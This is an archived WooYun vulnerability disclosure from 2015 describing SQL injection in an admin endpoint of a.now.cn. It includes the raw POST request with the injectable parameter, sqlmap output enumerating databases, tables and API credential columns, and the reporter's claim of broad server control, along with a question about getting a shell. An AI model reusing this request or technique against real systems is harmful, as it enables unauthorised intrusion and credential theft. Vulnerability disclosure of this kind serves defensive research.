乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-08-07: 细节已通知厂商并且等待厂商处理中 2015-08-07: 厂商已经确认,细节仅向厂商公开 2015-08-17: 细节向核心白帽子及相关领域专家公开 2015-08-27: 细节向普通白帽子公开 2015-09-06: 细节向实习白帽子公开 2015-09-21: 细节向公众公开
坐等忽略,顺便请教linux+php+apache后台拿shell的方法
注入点
POST /admin.php/website/check HTTP/1.1Content-Length: 328Content-Type: application/x-www-form-urlencodedHost: a.now.cnConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*submit=%e6%8f%90%e4%ba%a4&bind_status=3&id=*
数据库
available databases [11]:[*] #mysql50#lost+found[*] #mysql50#webphone.bak20150806[*] db_now_net_cn[*] information_schema[*] mysql[*] performance_schema[*] proftpd[*] test[*] webphone[*] webphone_bak[*] webphone_center
Database: db_now_net_cn[16 tables]+----------------+| APIControl || Albums || ApacheLog || ApacheLog_more || JTomcat || Options || Photos || Security || VDNS || VDNSI || VHostLog || VHostReferring || VHostServer || VHostServer_M || VHostSub || VHostSub_M |+----------------+
网站信息
Database: db_now_net_cnTable: APIControl[13 columns]+-------------+-------------+| Column | Type |+-------------+-------------+| APIContact | varchar(30) || APIHost | varchar(60) || APILogin | varchar(30) || APIName | varchar(50) || APIPassword | varchar(33) || APIPort | varchar(6) || chrEmail | varchar(30) || chrTel | varchar(30) || cltrid | int(11) || dtUpdate | datetime || IDAPI | int(11) || intActive | tinyint(4) || intMoney | int(11) |+-------------+-------------+
907个网站
Database: webphone_center+--------------------+---------+| Table | Entries |+--------------------+---------+| wp_admin_log | 2897 || wp_website | 907 || wp_themes | 26 || wp_themes_category | 11 || wp_admin | 1 |+--------------------+---------+
还有个7036张表的数据库,懒得跑了
web application technology: PHP 5.5.18, Apache 2.4.10back-end DBMS: MySQL 5.0[22:47:36] [WARNING] missing table parameter, sqlmap will retrieve the number of entries for all database management system databases' tables[22:47:36] [INFO] fetching tables for database: 'webphone_bak'[22:47:36] [INFO] the SQL query used returns 7036 entries[22:47:37] [WARNING] reflective value(s) found and filtering out[22:47:37] [INFO] retrieved: np_002_hr_category[22:47:37] [INFO] retrieved: np_200_hr_category[22:47:37] [INFO] retrieved: np_200_hr_company[22:47:38] [INFO] retrieved: np_200_hr_job[22:47:38] [INFO] retrieved: np_200_hr_list[22:47:38] [INFO] retrieved: np_200_link[22:47:39] [INFO] retrieved: np_200_nav[22:47:39] [INFO] retrieved: np_200_page[22:47:39] [INFO] retrieved: np_200_product[22:47:40] [INFO] retrieved: np_200_product_category[22:47:40] [INFO] retrieved: np_200_show[22:47:40] [INFO] retrieved: np_2013_admin[22:47:41] [INFO] retrieved: np_2013_admin_log[22:47:41] [INFO] retrieved: np_2013_article
登陆一下服务器配置
权限很大啊,可直接关闭,删除
23333
危害等级:中
漏洞Rank:10
确认时间:2015-08-07 18:02
谢谢
暂无